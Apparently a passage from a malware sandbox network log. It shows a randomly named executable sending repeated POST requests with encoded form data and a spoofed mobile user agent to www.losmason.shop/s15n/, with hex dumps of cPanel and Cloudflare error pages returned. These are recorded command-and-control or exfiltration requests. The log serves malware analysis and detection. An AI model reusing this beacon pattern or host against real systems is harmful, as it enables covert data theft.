                                                            Data Ascii: 278D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                            Jan 11, 2025 04:17:08.515969038 CET224INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                            Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
                                                            Jan 11, 2025 04:17:08.516007900 CET1236INData Raw: 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20
                                                            Data Ascii: ound-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; m
                                                            Jan 11, 2025 04:17:08.516045094 CET1236INData Raw: 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d
                                                            Data Ascii: dress { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0
                                                            Jan 11, 2025 04:17:08.516079903 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
                                                            Jan 11, 2025 04:17:08.516114950 CET672INData Raw: 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48
                                                            Data Ascii: 8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfE
                                                            Jan 11, 2025 04:17:08.516148090 CET1236INData Raw: 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73 56 78 4a 6f 51 77 6d 37 62 50 68 51 37 63 7a 61 35 45 43 47 51 47 70 67 36 54 6e 6a 7a 6d 57 42 62 55 37 74 45 78 6b 68 56 77 33 36 79 7a 33 48
                                                            Data Ascii: I9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPex3NaIQLwHIIQlQkPbwsRFpdmdb/hD8TSDCwTBu8W30sSIiS7
                                                            Jan 11, 2025 04:17:08.516182899 CET1116INData Raw: 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55 67 65 6a 65 6d 36 56 73 7a 77 61 4e 4a 35 49 51 54 39 72 38 41 55 46 30 34 2f 44 6f 4d 49 2b 4e 68 31 5a 57 35 4d 34 63 68 4a 35 79 75 4e 52 4d
                                                            Data Ascii: BdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab
                                                            Jan 11, 2025 04:17:08.516216993 CET1236INData Raw: 57 6b 41 62 38 31 6b 7a 38 66 45 6f 35 4e 61 30 72 41 51 59 55 38 4b 51 45 57 45 50 53 6b 41 61 61 66 6e 52 50 69 58 45 47 48 50 43 43 62 63 6e 78 70 68 49 45 50 50 6e 68 58 63 39 58 6b 52 4e 75 48 68 33 43 77 38 4a 58 74 65 65 43 56 37 5a 6a 67
                                                            Data Ascii: WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code {
                                                            Jan 11, 2025 04:17:08.516257048 CET792INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 69 6e 66 6f
                                                            Data Ascii: <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> www.nieuws-july202488.sbs/cp_errordocument.shtml (port 80)
                                                            Jan 11, 2025 04:17:08.516293049 CET135INData Raw: 3d 22 63 6f 70 79 72 69 67 68 74 22 3e 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 31 36 20 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: ="copyright">Copyright 2016 cPanel, Inc.</div> </a> </div> </footer> </body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.749982104.18.73.116806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:13.583718061 CET811OUTPOST /s15n/ HTTP/1.1
                                                            Host: www.losmason.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 220
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.losmason.shop
                                                            Referer: http://www.losmason.shop/s15n/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 45 64 34 70 70 51 73 4d 6e 35 54 79 2b 42 36 6f 4a 68 77 38 38 37 47 6c 66 2b 48 4c 2b 4c 6f 73 37 75 4c 7a 79 33 36 54 56 39 47 31 5a 77 58 42 4c 37 47 2b 57 65 6c 77 6f 46 30 43 4f 52 6d 62 33 31 62 42 31 78 44 6a 55 78 55 48 75 4d 4f 47 6f 53 38 6e 33 41 64 44 75 4e 35 45 56 49 2f 62 47 5a 6c 58 32 6f 73 49 33 43 55 37 43 5a 76 38 74 38 34 33 59 65 62 4c 30 79 67 75 52 67 6d 32 4c 52 47 70 49 6f 65 42 4e 6c 6f 78 67 31 68 54 4c 64 6e 77 4c 58 68 4a 62 76 77 6c 2b 68 55 53 47 6d 42 6f 37 39 4e 71 46 4e 70 78 65 69 31 67 71 65 48 38 2b 52 46 6a 5a 7a 45 59 79 32 39 5a 55 36 39 63 66 6f 61 79 6e 6f 57 74 42 71 52 62 4c 77 3d 3d
                                                            Data Ascii: MHJ0GXi=Ed4ppQsMn5Ty+B6oJhw887Glf+HL+Los7uLzy36TV9G1ZwXBL7G+WelwoF0CORmb31bB1xDjUxUHuMOGoS8n3AdDuN5EVI/bGZlX2osI3CU7CZv8t843YebL0yguRgm2LRGpIoeBNloxg1hTLdnwLXhJbvwl+hUSGmBo79NqFNpxei1gqeH8+RFjZzEYy29ZU69cfoaynoWtBqRbLw==
                                                            Jan 11, 2025 04:17:14.012012005 CET1236INHTTP/1.1 409 Conflict
                                                            Date: Sat, 11 Jan 2025 03:17:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 6119
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Vary: Accept-Encoding
                                                            Server: cloudflare
                                                            CF-RAY: 9001c0aa3b5a42be-EWR
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 44 4e 53 20 72 65 73 6f 6c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS resolution error | www.losmason.shop | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /><script>(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&
                                                            Jan 11, 2025 04:17:14.012075901 CET1236INData Raw: 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 65 72 72 6f 72 2d 66 65 65 64 62 61 63 6b 2d 73 75
                                                            Data Ascii: JSON.stringify){var e=function(a){var c=document.getElementById("error-feedback-survey"),d=document.getElementById("error-feedback-success"),b=new XMLHttpRequest;a={event:"feedback clicked",properties:{errorCode:1001,helpful:a,version:1}};b.op
                                                            Jan 11, 2025 04:17:14.012113094 CET1236INData Raw: 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 69 6e 6c 69
                                                            Data Ascii: pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span> <sp
                                                            Jan 11, 2025 04:17:14.012146950 CET1236INData Raw: 65 6e 74 69 61 6c 20 63 61 75 73 65 73 20 6f 66 20 74 68 69 73 3a 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 6c 2d 31 30 20 6d 74 2d 36 20 74 65 78 74 2d 31 35 20 74 65 78 74 2d 62 6c 61 63 6b 2d 64 61
                                                            Data Ascii: ential causes of this:</p> <ul class="ml-10 mt-6 text-15 text-black-dark antialiased leading-normal"> <li class="mb-4"><strong class="font-semibold">Most likely:</strong> if the owner just signed up for Cloudflare it
                                                            Jan 11, 2025 04:17:14.012200117 CET1236INData Raw: 20 54 68 61 6e 6b 20 79 6f 75 20 66 6f 72 20 79 6f 75 72 20 66 65 65 64 62 61 63 6b 21 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65
                                                            Data Ascii: Thank you for your feedback! </div></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <s
                                                            Jan 11, 2025 04:17:14.012237072 CET353INData Raw: 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 61
                                                            Data Ascii: st.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script></div>... /.error-footer --> </div>... /#cf-error-details


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.749983104.18.73.116806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:16.132200003 CET831OUTPOST /s15n/ HTTP/1.1
                                                            Host: www.losmason.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 240
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.losmason.shop
                                                            Referer: http://www.losmason.shop/s15n/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 45 64 34 70 70 51 73 4d 6e 35 54 79 2f 68 71 6f 61 51 77 38 74 4c 47 6b 43 4f 48 4c 6e 62 6f 6f 37 75 50 7a 79 32 2f 57 57 50 53 31 41 53 50 42 49 2f 79 2b 59 2b 6c 77 38 56 30 39 4b 52 6d 41 33 31 58 6a 31 77 2f 6a 55 78 51 48 75 4a 79 47 6f 68 45 67 32 51 64 4e 68 74 35 47 61 6f 2f 62 47 5a 6c 58 32 6f 34 69 33 43 4d 37 43 71 48 38 73 64 34 30 62 65 62 45 7a 79 67 75 62 41 6d 79 4c 52 47 62 49 70 79 37 4e 6a 30 78 67 77 6c 54 4c 49 54 7a 43 58 68 54 44 50 78 79 2f 78 78 68 43 79 46 68 68 2b 39 2b 63 39 42 70 57 30 30 43 77 38 4c 51 67 41 39 59 64 78 67 75 6c 51 67 73 57 37 35 45 53 4b 75 54 34 66 7a 48 4d 34 77 66 64 4f 54 39 31 32 49 42 68 6e 63 63 66 31 58 51 4b 4c 57 45 44 59 77 3d
                                                            Data Ascii: MHJ0GXi=Ed4ppQsMn5Ty/hqoaQw8tLGkCOHLnboo7uPzy2/WWPS1ASPBI/y+Y+lw8V09KRmA31Xj1w/jUxQHuJyGohEg2QdNht5Gao/bGZlX2o4i3CM7CqH8sd40bebEzygubAmyLRGbIpy7Nj0xgwlTLITzCXhTDPxy/xxhCyFhh+9+c9BpW00Cw8LQgA9YdxgulQgsW75ESKuT4fzHM4wfdOT912IBhnccf1XQKLWEDYw=
                                                            Jan 11, 2025 04:17:16.576186895 CET1236INHTTP/1.1 409 Conflict
                                                            Date: Sat, 11 Jan 2025 03:17:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 6119
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Vary: Accept-Encoding
                                                            Server: cloudflare
                                                            CF-RAY: 9001c0ba4b7543df-EWR
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 44 4e 53 20 72 65 73 6f 6c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS resolution error | www.losmason.shop | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /><script>(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&
                                                            Jan 11, 2025 04:17:16.576250076 CET1236INData Raw: 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 65 72 72 6f 72 2d 66 65 65 64 62 61 63 6b 2d 73 75
                                                            Data Ascii: JSON.stringify){var e=function(a){var c=document.getElementById("error-feedback-survey"),d=document.getElementById("error-feedback-success"),b=new XMLHttpRequest;a={event:"feedback clicked",properties:{errorCode:1001,helpful:a,version:1}};b.op
                                                            Jan 11, 2025 04:17:16.576291084 CET1236INData Raw: 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 69 6e 6c 69
                                                            Data Ascii: pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span> <sp
                                                            Jan 11, 2025 04:17:16.576324940 CET1236INData Raw: 65 6e 74 69 61 6c 20 63 61 75 73 65 73 20 6f 66 20 74 68 69 73 3a 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 6c 2d 31 30 20 6d 74 2d 36 20 74 65 78 74 2d 31 35 20 74 65 78 74 2d 62 6c 61 63 6b 2d 64 61
                                                            Data Ascii: ential causes of this:</p> <ul class="ml-10 mt-6 text-15 text-black-dark antialiased leading-normal"> <li class="mb-4"><strong class="font-semibold">Most likely:</strong> if the owner just signed up for Cloudflare it
                                                            Jan 11, 2025 04:17:16.576360941 CET1236INData Raw: 20 54 68 61 6e 6b 20 79 6f 75 20 66 6f 72 20 79 6f 75 72 20 66 65 65 64 62 61 63 6b 21 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65
                                                            Data Ascii: Thank you for your feedback! </div></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <s
                                                            Jan 11, 2025 04:17:16.576399088 CET353INData Raw: 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 61
                                                            Data Ascii: st.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script></div>... /.error-footer --> </div>... /#cf-error-details


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.749984104.18.73.116806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:18.677880049 CET1844OUTPOST /s15n/ HTTP/1.1
                                                            Host: www.losmason.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 1252
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.losmason.shop
                                                            Referer: http://www.losmason.shop/s15n/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 45 64 34 70 70 51 73 4d 6e 35 54 79 2f 68 71 6f 61 51 77 38 74 4c 47 6b 43 4f 48 4c 6e 62 6f 6f 37 75 50 7a 79 32 2f 57 57 50 71 31 63 33 62 42 4c 65 79 2b 5a 2b 6c 77 6a 6c 30 38 4b 52 6e 43 33 31 66 6e 31 77 7a 56 55 79 34 48 68 4c 4b 47 71 51 45 67 76 41 64 4e 6a 74 35 46 56 49 2f 4b 47 5a 31 54 32 6f 6f 69 33 43 4d 37 43 73 37 38 38 38 34 30 55 2b 62 4c 30 79 67 79 52 67 6e 56 4c 52 65 68 49 70 32 72 4b 56 45 78 67 51 31 54 59 75 50 7a 44 33 68 56 57 50 78 36 2f 78 4e 2b 43 7a 73 50 68 2f 4a 55 63 2b 68 70 48 51 31 43 73 2f 44 32 79 51 74 53 56 78 67 65 71 47 38 5a 66 62 35 4c 51 49 57 4a 39 50 50 70 44 4b 55 38 55 4c 53 42 30 46 4a 32 6d 58 73 73 57 52 2b 35 65 4f 36 56 64 2f 4c 50 34 76 61 43 34 4c 45 53 77 44 43 6a 50 59 47 39 55 50 4a 51 69 45 63 69 35 72 30 45 36 38 43 57 43 6f 6d 4b 37 33 2b 74 39 45 2b 71 79 51 4e 30 67 47 46 57 42 51 6f 2f 4e 49 33 4d 4f 34 2b 64 69 54 62 59 66 38 57 6b 39 72 56 58 59 5a 46 36 71 6f 7a 71 61 50 67 6a 38 78 47 71 41 53 71 61 54 49 [TRUNCATED]
                                                            Data Ascii: 